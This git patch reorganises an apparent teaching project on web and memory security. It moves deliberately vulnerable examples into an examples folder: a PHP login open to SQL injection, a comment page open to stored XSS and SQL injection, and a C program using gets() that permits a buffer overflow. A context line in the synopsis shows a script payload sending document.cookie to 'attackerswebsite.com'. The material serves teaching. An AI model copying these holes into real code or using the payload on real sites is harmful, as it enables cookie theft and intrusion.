From ee0bd3f7716546f679bd390d7b681fedf949b2fb Mon Sep 17 00:00:00 2001
From: Marcin Zelent <zelent.marcin@gmail.com>
Date: Wed, 30 May 2018 18:27:51 +0200
Subject: Added buffer overflow example

---
 .DS_Store                                  | Bin 0 -> 8196 bytes
 examples/buffer-overflow/buffer-overflow   | Bin 0 -> 8520 bytes
 examples/buffer-overflow/buffer-overflow.c |  18 +++++++++++++++
 examples/sql-injection/index.html          |  25 ++++++++++++++++++++
 examples/sql-injection/login.php           |  23 ++++++++++++++++++
 examples/sql-injection/users.db            | Bin 0 -> 8192 bytes
 examples/xss/comments.db                   | Bin 0 -> 8192 bytes
 examples/xss/index.php                     |  36 +++++++++++++++++++++++++++++
 sql-injection/index.html                   |  25 --------------------
 sql-injection/login.php                    |  23 ------------------
 sql-injection/users.db                     | Bin 8192 -> 0 bytes
 synopsis.pdf                               | Bin 167583 -> 259023 bytes
 synopsis.tex                               |  26 +++++++++++++++++++++
 xss/comments.db                            | Bin 8192 -> 0 bytes
 xss/index.php                              |  36 -----------------------------
 15 files changed, 128 insertions(+), 84 deletions(-)
 create mode 100644 .DS_Store
 create mode 100755 examples/buffer-overflow/buffer-overflow
 create mode 100644 examples/buffer-overflow/buffer-overflow.c
 create mode 100644 examples/sql-injection/index.html
 create mode 100644 examples/sql-injection/login.php
 create mode 100644 examples/sql-injection/users.db
 create mode 100644 examples/xss/comments.db
 create mode 100644 examples/xss/index.php
 delete mode 100644 sql-injection/index.html
 delete mode 100644 sql-injection/login.php
 delete mode 100644 sql-injection/users.db
 delete mode 100644 xss/comments.db
 delete mode 100644 xss/index.php

diff --git a/.DS_Store b/.DS_Store
new file mode 100644
index 0000000..6049920
Binary files /dev/null and b/.DS_Store differ
diff --git a/examples/buffer-overflow/buffer-overflow b/examples/buffer-overflow/buffer-overflow
new file mode 100755
index 0000000..c518559
Binary files /dev/null and b/examples/buffer-overflow/buffer-overflow differ
diff --git a/examples/buffer-overflow/buffer-overflow.c b/examples/buffer-overflow/buffer-overflow.c
new file mode 100644
index 0000000..96f0ee8
--- /dev/null
+++ b/examples/buffer-overflow/buffer-overflow.c
@@ -0,0 +1,18 @@
+#include <stdio.h>
+#include <string.h>
+
+int main(void)
+{
+	char buf[16];
+	int ok = 0;
+
+	printf("Type admin password: \n");
+	gets(buf);
+
+	if (strcmp(buf, "pass123")) printf("\nWrong password!\n");
+	else ok = 1;
+
+	if (ok) printf("\nLogged in as admin.\n");
+
+	return 0;
+}
diff --git a/examples/sql-injection/index.html b/examples/sql-injection/index.html
new file mode 100644
index 0000000..d3e760b
--- /dev/null
+++ b/examples/sql-injection/index.html
@@ -0,0 +1,25 @@
+<!DOCTYPE HTML>
+<html>
+	<head>
+		<title>Login page</title>
+		<meta charset="utf-8" />
+<style>
+body {
+	text-align: center;
+}
+
+input {
+	margin-bottom: 5px;
+}
+
+</style>
+	</head>
+	<body>
+		<h1>Login</h1>
+		<form action="login.php" method="post">
+			<input type="text" name="email" placeholder="E-mail"><br>
+			<input type="password" name="pass" placeholder="Password"><br>
+			<input type="submit" value="Log in">
+		</form>
+	</body>
+</html>
diff --git a/examples/sql-injection/login.php b/examples/sql-injection/login.php
new file mode 100644
index 0000000..826c38c
--- /dev/null
+++ b/examples/sql-injection/login.php
@@ -0,0 +1,23 @@
+<?php
+   class MyDB extends SQLite3 {
+      function __construct() {
+         $this->open('users.db');
+      }
+   }
+
+   if(isset($_POST['email'], $_POST['pass']))
+   {
+	$email = $_POST['email'];
+	$pass = $_POST['pass'];
+
+	$db = new MyDB();
+
+	$sql = 'SELECT * FROM Users WHERE email=\''.$email.'\' AND password=\''.$pass.'\'';
+
+	$ret = $db->query($sql);
+	while($row = $ret->fetchArray(SQLITE3_ASSOC)) {
+		echo 'Logged in as '.$row['email'].'<br>';
+	}
+	$db->close();
+   }
+?>
diff --git a/examples/sql-injection/users.db b/examples/sql-injection/users.db
new file mode 100644
index 0000000..9ddf64e
Binary files /dev/null and b/examples/sql-injection/users.db differ
diff --git a/examples/xss/comments.db b/examples/xss/comments.db
new file mode 100644
index 0000000..32114c2
Binary files /dev/null and b/examples/xss/comments.db differ
diff --git a/examples/xss/index.php b/examples/xss/index.php
new file mode 100644
index 0000000..e645517
--- /dev/null
+++ b/examples/xss/index.php
@@ -0,0 +1,36 @@
+<?php
+	class MyDB extends SQLite3 {
+      function __construct() {
+         $this->open('comments.db');
+      }
+   }
+
+	if (isset($_POST['user'], $_POST['comment'])) {
+		$user = $_POST['user'];
+		$comment = $_POST['comment'];
+
+		$db = new MyDB();
+
+		$sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' . $comment . '\')';
+		$ret = $db->exec($sql);
+		$db->close();
+	}
+
+	echo '<!DOCTYPE HTML><html><head><title>Comments</title>' .
+	   	 '<meta charset="utf-8"></head><body><h1>Comments</h1>';
+
+	$db = new MyDB();
+
+	$sql = 'SELECT * FROM Comments';
+	$ret = $db->query($sql);
+	while ($row = $ret->fetchArray(SQLITE3_ASSOC))
+		echo '<p><b>' . $row['user'] . '</b> says:<br>' . $row['comment'] . '</p>';
+
+	$db->close();
+
+	echo '<h2>Add comment</h1><form action="index.php" method="post">' .
+		 '<input type="text" name="user" placeholder="User name"><br>' .
+		 '<input type="text" name="comment" placeholder="Comment"><br>' .
+		 '<input type="submit" value="Add"><br>' .
+		 '</form></body></html>';
+?>
diff --git a/sql-injection/index.html b/sql-injection/index.html
deleted file mode 100644
index d3e760b..0000000
--- a/sql-injection/index.html
+++ /dev/null
@@ -1,25 +0,0 @@
-<!DOCTYPE HTML>
-<html>
-	<head>
-		<title>Login page</title>
-		<meta charset="utf-8" />
-<style>
-body {
-	text-align: center;
-}
-
-input {
-	margin-bottom: 5px;
-}
-
-</style>
-	</head>
-	<body>
-		<h1>Login</h1>
-		<form action="login.php" method="post">
-			<input type="text" name="email" placeholder="E-mail"><br>
-			<input type="password" name="pass" placeholder="Password"><br>
-			<input type="submit" value="Log in">
-		</form>
-	</body>
-</html>
diff --git a/sql-injection/login.php b/sql-injection/login.php
deleted file mode 100644
index 826c38c..0000000
--- a/sql-injection/login.php
+++ /dev/null
@@ -1,23 +0,0 @@
-<?php
-   class MyDB extends SQLite3 {
-      function __construct() {
-         $this->open('users.db');
-      }
-   }
-
-   if(isset($_POST['email'], $_POST['pass']))
-   {
-	$email = $_POST['email'];
-	$pass = $_POST['pass'];
-
-	$db = new MyDB();
-
-	$sql = 'SELECT * FROM Users WHERE email=\''.$email.'\' AND password=\''.$pass.'\'';
-
-	$ret = $db->query($sql);
-	while($row = $ret->fetchArray(SQLITE3_ASSOC)) {
-		echo 'Logged in as '.$row['email'].'<br>';
-	}
-	$db->close();
-   }
-?>
diff --git a/sql-injection/users.db b/sql-injection/users.db
deleted file mode 100644
index 9ddf64e..0000000
Binary files a/sql-injection/users.db and /dev/null differ
diff --git a/synopsis.pdf b/synopsis.pdf
index 25d6747..171a21b 100644
Binary files a/synopsis.pdf and b/synopsis.pdf differ
diff --git a/synopsis.tex b/synopsis.tex
index e844895..9c115c8 100644
--- a/synopsis.tex
+++ b/synopsis.tex
@@ -740,5 +740,31 @@ INSERT INTO Comments VALUES('attacker','hello
 <script>document.createElement("img").src =
 "http://attackerswebsite.com/" + document.cookie</script>');
 \end{minted}
+\newpage
+
+\appendix
+\section{Buffer overflow example}
+
+\subsection{buffer-overflow.c}
+\begin{minted}{c}
+#include <stdio.h>
+#include <string.h>
+
+int main(void)
+{
+	char buf[16];
+	int ok = 0;
+
+	printf("Type admin password: \n");
+	gets(buf);
+
+	if (strcmp(buf, "pass123")) printf("\nWrong password!\n");
+	else ok = 1;
+
+	if (ok) printf("\nLogged in as admin.\n");
+
+	return 0;
+}
+\end{minted}
 
 \end{document}
diff --git a/xss/comments.db b/xss/comments.db
deleted file mode 100644
index 32114c2..0000000
Binary files a/xss/comments.db and /dev/null differ
diff --git a/xss/index.php b/xss/index.php
deleted file mode 100644
index e645517..0000000
--- a/xss/index.php
+++ /dev/null
@@ -1,36 +0,0 @@
-<?php
-	class MyDB extends SQLite3 {
-      function __construct() {
-         $this->open('comments.db');
-      }
-   }
-
-	if (isset($_POST['user'], $_POST['comment'])) {
-		$user = $_POST['user'];
-		$comment = $_POST['comment'];
-
-		$db = new MyDB();
-
-		$sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' . $comment . '\')';
-		$ret = $db->exec($sql);
-		$db->close();
-	}
-
-	echo '<!DOCTYPE HTML><html><head><title>Comments</title>' .
-	   	 '<meta charset="utf-8"></head><body><h1>Comments</h1>';
-
-	$db = new MyDB();
-
-	$sql = 'SELECT * FROM Comments';
-	$ret = $db->query($sql);
-	while ($row = $ret->fetchArray(SQLITE3_ASSOC))
-		echo '<p><b>' . $row['user'] . '</b> says:<br>' . $row['comment'] . '</p>';
-
-	$db->close();
-
-	echo '<h2>Add comment</h1><form action="index.php" method="post">' .
-		 '<input type="text" name="user" placeholder="User name"><br>' .
-		 '<input type="text" name="comment" placeholder="Comment"><br>' .
-		 '<input type="submit" value="Add"><br>' .
-		 '</form></body></html>';
-?>
-- 
cgit v1.2.3